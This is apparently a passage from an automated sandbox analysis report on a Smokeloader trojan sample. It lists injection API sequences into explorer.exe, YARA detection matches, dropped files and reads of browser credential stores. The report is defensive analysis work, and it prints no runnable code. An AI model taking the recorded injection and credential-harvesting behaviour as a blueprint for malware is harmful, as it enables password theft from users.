                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeCode function: 0_2_004022F7 NtQuerySystemInformation,NtQueryInformationProcess,0_2_004022F7
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeCode function: 0_2_00402686 NtClose,0_2_00402686
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_03004B92 RtlMoveMemory,NtUnmapViewOfSection,6_2_03004B92
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_030033C3 NtQueryInformationFile,6_2_030033C3
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_0300342B NtQueryObject,NtQueryObject,RtlMoveMemory,6_2_0300342B
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_0300349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,6_2_0300349B
                    Source: C:\Windows\explorer.exeCode function: 7_2_009838B0 NtUnmapViewOfSection,7_2_009838B0
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 8_2_00831016 RtlMoveMemory,NtUnmapViewOfSection,8_2_00831016
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_00383D8D RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,9_2_00383D8D
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_00382E1B OpenProcess,lstrcmpiA,NtQueryInformationProcess,NtQueryInformationProcess,StrStrIW,9_2_00382E1B
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_00381FE5 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,9_2_00381FE5
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_00381F4E NtCreateSection,NtMapViewOfSection,9_2_00381F4E
                    Source: C:\Windows\explorer.exeCode function: 10_2_00CA5300 RtlAllocateHeap,NtUnmapViewOfSection,10_2_00CA5300
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00841016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,FindCloseChangeNotification,Sleep,11_2_00841016
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00841A80 NtCreateSection,NtMapViewOfSection,11_2_00841A80
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00841819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,11_2_00841819
                    Source: C:\Windows\explorer.exeCode function: 15_2_00F7355C RtlAllocateHeap,NtUnmapViewOfSection,15_2_00F7355C
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_006D1016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,FindCloseChangeNotification,Sleep,16_2_006D1016
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_006D1B26 NtCreateSection,NtMapViewOfSection,16_2_006D1B26
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_006D18BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,16_2_006D18BF
                    Source: C:\Windows\explorer.exeCode function: 17_2_0043370C RtlAllocateHeap,NtUnmapViewOfSection,17_2_0043370C
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_030021986_2_03002198
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_0301B35C6_2_0301B35C
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_0300C2F96_2_0300C2F9
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_030544386_2_03054438
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_0301B97E6_2_0301B97E
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_03025F086_2_03025F08
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_03006E6A6_2_03006E6A
                    Source: C:\Windows\explorer.exeCode function: 7_2_00981E207_2_00981E20
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 8_2_0083170B8_2_0083170B
                    Source: C:\Windows\explorer.exeCode function: 10_2_00CA2C0010_2_00CA2C00
                    Source: C:\Windows\explorer.exeCode function: 15_2_00F7286015_2_00F72860
                    Source: C:\Windows\explorer.exeCode function: 15_2_00F7205415_2_00F72054
                    Source: C:\Windows\explorer.exeCode function: 17_2_004320F417_2_004320F4
                    Source: C:\Windows\explorer.exeCode function: 17_2_00432A0417_2_00432A04
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 03007F70 appears 31 times
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 03008801 appears 38 times
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7716 -s 700
                    Source: rrrrcve.1.drStatic PE information: No import functions for PE file found
                    Source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeStatic PE information: No import functions for PE file found
                    Source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: 00000000.00000002.1743449635.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                    Source: 00000005.00000002.1970433561.0000000001FC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                    Source: 00000000.00000002.1742950739.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                    Source: 00000005.00000002.1970165138.00000000001B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                    Source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: rrrrcve.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: rrrrcve.1.drStatic PE information: Section .text
                    Source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeStatic PE information: Section .text
                    Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winEXE@21/15@1/1
                    Source: C:\Windows\SysWOW64\explorer.exeCode function: 8_2_0083274A CreateToolhelp32Snapshot,Process32First,lstrcmpiA,Process32Next,FindCloseChangeNotification,8_2_0083274A
                    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rrrrcveJump to behavior
                    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7716
                    Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A711.tmpJump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                    Source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: AA70.tmp.6.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeReversingLabs: Detection: 55%
                    Source: 171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeVirustotal: Detection: 57%
                    Source: unknownProcess created: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe "C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\rrrrcve C:\Users\user\AppData\Roaming\rrrrcve
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7716 -s 700
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                    Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                    Source: C:\Users\user\Desktop\171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\rrrrcveSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
